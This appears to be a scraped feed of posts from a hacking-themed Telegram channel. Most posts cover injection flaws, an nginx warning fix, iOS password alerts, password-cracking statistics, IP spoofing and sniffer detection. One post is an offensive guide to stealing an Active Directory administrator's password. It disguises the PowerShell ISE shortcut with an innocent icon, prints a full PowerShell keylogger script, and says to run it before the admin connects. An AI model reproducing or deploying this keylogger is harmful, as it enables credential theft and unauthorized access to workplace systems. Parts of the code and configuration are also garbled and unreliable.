UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Database Injection: all you need to know :)


1) In case of sending untrusted pieces of data to the interpreter as a part of command through any area that takes user input i.e form input or any other data submission area, injection flaws occur.

2) The attacker’s malicious queries can trick the interpreter into executing commands that can show up confidential data that the user has no authorization to have a look at. For example in an SQL injection attack, when the form input is not properly sanitized, the attacker can enter the SQL database and access its contents without authorization,, just by entering malicious SQL database code in a form that is expecting a plaintext. Any type of field that takes the user’s input is injectable i.e parameters, environment variables, all web services, etc.

3) The application is vulnerable to the injection attack when user-supplied data is not sanitized and validated, by the use of dynamic queries without context-aware escaping and the use of hostile data directly. Injection flaws can easily be discovered through the examination of code and by the use of automated tools like scanners and fuzzers. To prevent injection attacks, there is some measure that can be taken like separating the data from commands and queries, use of a safe API that provides a parameterized interface, use of β€œwhite-list” server-side input validation through tools like Snort, escaping of special characters using specific escape syntax, etc.

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ›  How to fix the [warn] could not build optimal proxy_headers_hash error ?

1) How to solve the problem: β€œnginx: [warn] could not build optimal proxy_headers_hash, you should increase either p roxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size error β€œ.

2) If you have an Nginx proxy that proxies multiple sites, you may encounter the error shown above in one way or another.

3) To fix the error, you will need to edit the files that serve the proxy sites.

were located in the /etc/nginx/sites.d/ directory.


πŸ¦‘location ~ /.git {
deny all;
}
proxy_redirect off; proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
###### Set as shown below. You can use other values for the numbers as you wish
proxy_headers_hash_max_size 512;
proxy_headers_hash_bucket_size 128;

proxy_redirect off;
proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}


4) After you've finished editing this small part, check your Nginx configuration by running the nginx -t command.

sudo nginx -t

5) You should get the following output:

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How Password Tracking to Protect Against Hacks Works in iOS 14 ?

A) Monitoring passwords in Safari

1) If iCloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site.

2) If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:

β€œThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "

β€œThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?


3) If you click on the "Change password on the site" button, a window will open in the "Passwords" menu in the system settings. Here you can enter and change the password on the site or use the "Forgot your password?" Command, depending on the options available on the site. iCloud Keychain helps you choose a strong password.

If the site has an option to sign in with an Apple account, it is suggested to do just that instead of having iCloud Keychain automatically generate a password. You will use your Apple ID to sign in to your account. This will limit the amount of information the site collects about you.

B) Monitoring passwords in settings

1) If you do not want to wait for the warning about vulnerable passwords from Safari, for which you need to sign in to your account on the site, you can open system preferences and see the security recommendations. This way you can take action before it's too late. This is also useful if you store passwords in the iCloud Keychain, but don't use it for automatic data entry, so you won't get alerts in Safari.

2) Open the "Passwords" section in the system settings. Or you can tell Siri to "Open Passwords." Use Face ID, Touch ID, or PIN to sign in.

3) After logging into your account, you will see an option to auto-complete passwords. Here you can choose iCloud Keychain or another password manager like LastPass to automatically enter your username and password. Below this option and before the list of accounts, you will see security recommendations. Open them up.

4 ) you will find high priority password changing guidelines that may be weak or used on more than one site. Other suggestions are given below. You will also see high priority password change recommendations that have emerged in data breaches.

You can click "Change password on the site" and this site will open. Or you can click on an account for more information. You will see your username and password, as well as risks associated with your account, such as weak and repeatedly used passwords. There is also a link "Change password on the site".

5) If you choose this link, iCloud Keychain can help you guess a new password, just like you do in Safari. You can sign in with your Apple account if the site supports it.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘βš™οΈHow to get an admin password on a work PC in an Active Directory domain?

A) we
will tell you about the method by which we can get the admin password in the Active Directory domain of your organization. It can be used to install, uninstall software, disable antivirus, access many corporate domain resources, access documents of other users on their PCs, and much more delicious. Well, first things first.

!) First, we find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example a folder icon or an icon of software allowed in the organization in * .ico format, for example 1C. I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.

πŸ¦‘Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

Start-KeyLogger
Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, run our script with the Run script command or with the F5 button and minimize the window


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
get an admin password on a work PC in an Active Directory domain
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Hackers crack 16-bit passwords within 1 hour and hash password security research :

1) Anti-virus research information security professionals said that hackers cracking passwords are as straightforward and simple as our clients use . Avast’s AntonΓ­n HΓ½ΕΎa has been engaged in password security research for many years.

2) He has collected nearly 40,000 password samples and found that only 10% of the passwords in these samples are β€œbeyond the level that can be guessed and cracked under normal circumstances”. It can be cracked very easily. In these samples, almost no password contains uppercase English characters , although software security experts often remind you to use a mixture of uppercase and lowercase characters to set the password (finally know why Apple’s password must be uppercase, lowercase and then add numbers. ). And usually these passwords have an average length of 6 characters , and only 52 passwords exceed 12 characters. The frequently mentioned passwords use some special characters , but there are only a handful of people who really set this format.

3) A hacker group recently tried to crack more than 14,800 random passwords. Each hacker has a success rate of 62% to 90% , and successfully cracked 90% of the hash code in less than an hour by using a computer cluster . It is reported that the hacker group serves the ArsTechnica website. In order to better study the hacking strategy, they also published a method to crack the password. In addition to repeatedly entering passwords and passwords on the website, the hacker team also tried to obtain a series of hashed passwords online.

4) The hashing method makes it difficult for hackers to return to the password from the hash table, and it also allows the website to store a series of hashes instead of storing them as low-security text passwords. This means that even if the hashed password is stolen, the real plain text password will still be stored securely .


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What Is IP Spoofing Data is transferred via the internet through "packets." An IP (Internet Protocol) address is a unique code that each computer has that identifies the machine these packets are being sent from. IP addresses can be used to identify where a computer is connecting from. In many cases IP look-up services such as whois.com can provide information about who may be using the computer that is associated with an IP address. IP Spoofing is the process of using a fake or random IP address in an attempt to mask where a computer is connecting from or which computer is connecting to a network.

Why IP Spoofing Happens As the internet has grown in scope and usability, so too has the network of individuals who would seek to manipulate internet network protocols for criminal and malicious purposes. Not all cases of IP spoofing are of malevolent intent; for example, some people choose to spoof their IP addresses when going to web sites that the believe have politically or morally questionable content, in fear that their IP address will be saved and they may one day be associated with unpopular causes or viewpoints. However, a significant percentage of IP spoofing happens because those with dubious intent seek to disguise the source of their attacks.

For example, individuals or groups coordinating denial of service (DOS) attacks will often send a barrage of traffic in the form of fake or random IP addresses to certain websites or networks in an attempt to render the sever or servers hosting the sites incapable of processing the traffic, and thus anonymously shutting down the website or network.

Another common use of IP spoofing is the circumvention of user authentication based on IP address or region. For instance, many corporations use an intranet. In order to access all the content on this intranet, the machines requesting access must have an IP address within a specified valid range that shows it is recognized as a trusted machine or the machine is being access from a trusted location. By spoofing a connection from a trusted machine, individuals are able to bypass this authentication method and illegally access the network.

Ways To Protect Yourself Against IP Spoofing IP spoofing can allow an outside party to steal sensitive information or inflict damage on your network. Fortunately, there are a few ways that you can protect yourself against this menace.

The first step you should take is to eliminate host-based authentication on your network. Host-based authentication uses the public host key of the client machine to authenticate a user. Rely instead on network encryption, which sends encrypted packets over a network.

https://github.com/greenarmor/Net-Spoofing-tool
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to defend against Sniffer attacks ?

1) Autosniffer is a tool developed by the well-known hacker organization (now a security company) L0pht. It is used to detect whether there is a machine in the local network in promiscuous mode (that is, listening mode).

2) A machine in promiscuous mode means that it has probably been hacked and Sniffer installed. It is very important for network administrators to understand which machine is in promiscuous mode for further investigation.

3) Antisniff 1.X version runs in the WindOWS NT system of Ethernet and provides a simple and easy-to-use graphical user interface. The tool tests whether the remote system is capturing and analyzing data packets that are not sent to it in a variety of ways. These test methods have nothing to do with the operating system itself.

4) Antisniff runs on a network segment of the local Ethernet. If it runs in a non-switched Class C network, Antisniff can monitor the entire network; if the network switches are isolated according to working groups, each working group needs to run an Antisniff. The reason is that some special tests use invalid Ethernet addresses, and some tests require statistics in promiscuous mode (such as response time, packet loss rate, etc.).

5) The usage of Antisniff is very simple, select the machine to be checked in the graphical interface of the tool, and specify the checking frequency. For tests other than network response time checks, each machine will return a certain positive or negative value. The returned positive value indicates that the machine is in promiscuous mode, which may have already been installed Sniffer.

6) For the return value of the network response time test, it is recommended to calculate the standard value based on the value returned for the first time, and then check the machine that has a large change in the results returned during the two tests of flood and non-flood. Once these machines exit promiscuous mode and return to normal operation mode, the next test of Antisniff will record the difference (positive value) between promiscuous mode and non-promiscuous mode.

7) Antisniff should be run periodically. The specific period value varies according to different sites, different network loads, the number of machines tested, and website strategies.

https://github.com/LYSYyy/AutoSniff

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁